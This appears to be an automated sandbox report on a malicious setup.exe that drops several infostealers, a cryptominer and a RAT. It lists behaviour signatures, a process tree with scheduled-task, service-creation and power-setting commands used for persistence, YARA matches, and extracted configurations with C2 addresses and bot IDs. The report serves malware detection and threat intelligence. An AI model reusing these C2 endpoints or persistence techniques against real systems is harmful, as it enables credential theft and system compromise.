Edit tour

Windows Analysis Report
1719859269.0326595_setup.exe

Overview

General Information

Sample name:	1719859269.0326595_setup.exe
Analysis ID:	1465682
MD5:	00af1a53860550f8db3f1b250436b78a
SHA1:	67dce838cd0e8410ba30b243520dc06f31c1bae6
SHA256:	86ccbff05056433ad05dcc8dfcf5b9b89bda2b2bbbe74a609e1d333f38cee3e4
Tags:	exe
Infos:

Detection

LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected MSILDownloaderGeneric

Yara detected Mars stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates HTML files with .exe extension (expired dropper behavior)

Disable Windows Defender real time protection (registry)

Disables Windows Defender (deletes autostart)

Drops PE files to the document folder of the user

Exclude list of file types from scheduled, custom, and real-time scanning

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Group Policy settings

Modifies power options to not sleep / hibernate

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Windows Defender Exclusions Added - Registry

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1719859269.0326595_setup.exe (PID: 5720 cmdline: "C:\Users\user\Desktop\1719859269.0326595_setup.exe" MD5: 00AF1A53860550F8DB3F1B250436B78A)

IVTULQzdBmF3Bc0NeoxSnYvg.exe (PID: 1464 cmdline: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe MD5: 2AB891D9C6B24C5462E32A0BAB3D1FEC)

schtasks.exe (PID: 4188 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7292 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

H1pBxuA3W1wJGbhYT2DZXaLH.exe (PID: 1756 cmdline: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe MD5: CD591EBEF2FB36E6D0C67B0237D3B1BE)

H1pBxuA3W1wJGbhYT2DZXaLH.tmp (PID: 5564 cmdline: "C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp" /SL5="$70066,5141152,54272,C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe" MD5: 6F995E2D6C8D0D1D03CB3AFCD1DEAFAF)

mp3doctorfree32_64.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe" -i MD5: 0918C3DC6A1E6CCE306FA4FF996E66BB)

Lbg6Jgx2PuK0JimgGIFCI5UU.exe (PID: 6256 cmdline: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe MD5: B58A3998F5CE749FD2DD6B8651FDE46C)

alXewrRe7Pi_SQbFkI0y1vcR.exe (PID: 4460 cmdline: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe MD5: CB7CC0288990AB8DD4F1200D372A6A92)

Install.exe (PID: 6932 cmdline: .\Install.exe MD5: 5FA0CB47D0F8879A4ABD65363062A198)

Install.exe (PID: 4256 cmdline: .\Install.exe /bfYudidAVdU "385137" /S MD5: 71BF676AE80AFA9F2577D2EAE6A133AE)

4MZEKMRe7m6bc8qivCccLsq8.exe (PID: 6460 cmdline: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe MD5: 520F92170A2CF78ED3152F83973B9B66)

MSBuild.exe (PID: 2704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

yHP2Z5SFUIZjI8pAKB_H3QUP.exe (PID: 2876 cmdline: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe MD5: 06333E350E25E29677256D9BE86E4EE1)

MSBuild.exe (PID: 7080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe (PID: 2884 cmdline: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe MD5: 3B24971C5FEF776DB7DF10A769F0857A)

powercfg.exe (PID: 2096 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2544 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2828 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 1976 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5720 cmdline: C:\Windows\system32\sc.exe delete "CIFUBVHI" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7284 cmdline: C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

yTXn1eeuAPe6JeFa5Kfn6hMY.exe (PID: 2744 cmdline: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe MD5: 2BC0DB539A8FAB08BF4104EB7F2DE7E7)

kUJOpvLlbhqCDkTlllfRFIPb.exe (PID: 5440 cmdline: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe MD5: 3821B6AD2BE5C1F137F798889C75B8FC)

Install.exe (PID: 3796 cmdline: .\Install.exe MD5: B3120D636B76D400397F33F9475EBBDF)

Install.exe (PID: 4044 cmdline: .\Install.exe /iwYBYdidlHmT "525403" /S MD5: 84DA5FC2F43E551848349F0D0D3FACA4)

4Q6k8SlqG7M24bYO3UgMWICf.exe (PID: 424 cmdline: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe MD5: 75A2D212A591A83A4D0C88A92B390B88)

RegAsm.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 284 MD5: C31336C1EFC2CCB44B4326EA793040F2)

conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 5820 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 4576 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6960 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 4152 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5664 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 424 -ip 424 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 5036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WinTrackerSP.exe (PID: 7368 cmdline: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe MD5: 2AB891D9C6B24C5462E32A0BAB3D1FEC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: StealC

{"C2 url": "85.28.47.4/920475a59bac849d.php"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "4e7fbe36a69903b4dfa6c1b767f4bf81"}

Threatname: RedLine

{"C2 url": ["77.105.135.107:3445"], "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-64K5G.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\MP3Doctor Free 2020\mp3doctorfree32_64.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.3364376195.0000000004B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000E.00000002.2560583044.000000C00023A000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000002.2559747282.0000000003335000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2550868156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001F.00000000.2392814904.0000000000401000.00000020.00000001.01000000.0000001D.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000C.00000002.2451450016.0000000004314000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000015.00000002.2806277052.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.2421723577.000000000338B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.2451450016.000000000437B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001B.00000002.2396195188.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.2451450016.00000000042E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000002.2414041774.000000000073A000.00000004.00000001.01000000.0000000D.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2571364769.000000C000802000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000C.00000002.2451450016.00000000043AF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000011.00000002.2559747282.00000000035D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1719859269.0326595_setup.exe PID: 5720	JoeSecurity_MSIL_Downloader_Generic	Yara detected MSIL_Downloader_Generic	Joe Security
Process Memory Space: 1719859269.0326595_setup.exe PID: 5720	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 4MZEKMRe7m6bc8qivCccLsq8.exe PID: 6460	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.4314a88.6.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.4314a88.6.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
21.2.MSBuild.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
17.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.1719859269.0326595_setup.exe.21663cfc420.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.1719859269.0326595_setup.exe.21663d50aa0.19.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
27.2.MSBuild.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
27.2.MSBuild.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
27.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45791:$s1: file:/// 0x456ed:$s2: {11111-22222-10009-11112} 0x45721:$s3: {11111-22222-50001-00000} 0x4272d:$s4: get_Module 0x3ceab:$s5: Reverse 0x3db47:$s6: BlockCopy 0x3cdb1:$s7: ReadByte 0x457a3:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.3.1719859269.0326595_setup.exe.21663d50aa0.22.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.73ab00.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43991:$s1: file:/// 0x438ed:$s2: {11111-22222-10009-11112} 0x43921:$s3: {11111-22222-50001-00000} 0x4092d:$s4: get_Module 0x3b0ab:$s5: Reverse 0x3bd47:$s6: BlockCopy 0x3afb1:$s7: ReadByte 0x439a3:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3ac5990.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45791:$s1: file:/// 0x11ebf9:$s1: file:/// 0x18ac19:$s1: file:/// 0x456ed:$s2: {11111-22222-10009-11112} 0x11eb55:$s2: {11111-22222-10009-11112} 0x18ab75:$s2: {11111-22222-10009-11112} 0x45721:$s3: {11111-22222-50001-00000} 0x11eb89:$s3: {11111-22222-50001-00000} 0x18aba9:$s3: {11111-22222-50001-00000} 0x4272d:$s4: get_Module 0x11bb95:$s4: get_Module 0x187bb5:$s4: get_Module 0x3ceab:$s5: Reverse 0x116313:$s5: Reverse 0x182333:$s5: Reverse 0x3db47:$s6: BlockCopy 0x116faf:$s6: BlockCopy 0x182fcf:$s6: BlockCopy 0x3cdb1:$s7: ReadByte 0x116219:$s7: ReadByte 0x182239:$s7: ReadByte
31.0.mp3doctorfree32_64.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0.3.1719859269.0326595_setup.exe.21663d7f760.30.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.1719859269.0326595_setup.exe.21663d7f760.26.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.6a0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.1719859269.0326595_setup.exe.21663d1e060.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
